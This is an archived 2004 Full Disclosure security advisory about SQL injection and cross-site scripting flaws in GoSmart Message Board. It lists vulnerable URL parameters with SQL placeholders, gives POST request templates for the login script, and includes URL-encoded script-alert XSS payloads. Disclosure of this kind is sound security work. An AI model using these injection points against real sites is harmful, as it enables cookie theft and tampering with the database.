Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

[MAxpatrol Security Advisory] Multiple vulnerabilities in GoSmart Message Board
From: "Alexander Antipov" <antipov () SecurityLab ru>
Date: Mon, 11 Oct 2004 16:26:50 +0400

This vulnerability was discovered by Positive Technologies using
MaxPatrol (www.maxpatrol.com) - intellectual professional security
scanner. It is able to detect a substantial amount of vulnerabilities
not published yet. MaxPatrol's intelligent algorithms are also capable
to detect a lot of vulnerabilities in custom web-scripts (XSS, SQL and
code injections, HTTP Response splitting).
 

Date: 11.10.04

Severity: Low

 

Application: GoSmart Message Board, http://www.gosmart4u.com/forum.aspx

 

Platform: ASP

 

I. DESCRIPTION

--------------

Multiple vulnerabilities were found in GoSmart Message Board. A remote
user can conduct SQL injection attack and Cross site scripting attack. 



1. SQL injection (minimal risk, because using Access database)

 
messageboard/Forum.asp?QuestionNumber=[SQL CODE HERE]&Find=1&Category=1

messageboard/Forum.asp?Username=&Category=[SQL CODE HERE]

messageboard/Forum.asp?QuestionNumber=[SQL CODE HERE]&Find=1

messageboard/Forum.asp?Category=[SQL CODE HERE]

POST /messageboard/Login_Exec.asp HTTP/1.1 
Host: www.gosmart4u.com 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 29 

Username=[SQL CODE HERE]&Password=1&Login=1 


POST /messageboard/Login_Exec.asp HTTP/1.1 
Host: www.gosmart4u.com 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 29 

Username=1&Password=[SQL CODE HERE]&Login=1

 
2. XSS:

/messageboard/Forum.asp?QuestionNumber=1&Find=1&Category=%22%3E%3Cscript
%3Ealert%28%29%3C%2Fscript%3E%3C%22

/messageboard/ReplyToQuestion.asp?MainMessageID=%22%3E%3Cscript%3Ealert%
28%29%3C%2Fscript%3E%3C%22


 

II. IMPACT

----------


A remote user can access the target user's cookies (including
authentication cookies).   

A remote user can cause SQL commands to be executed by the underlying
database.

 


III. SOLUTION

-------------
Not available currently.

 

IV. VENDOR FIX/RESPONSE

-----------------------
n/a
 

V. CREDIT

-------------
Positive Technologies (www.ptsecurity.com) is information security
company especially focused on development of MaxPatrol - professional
security scanner.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault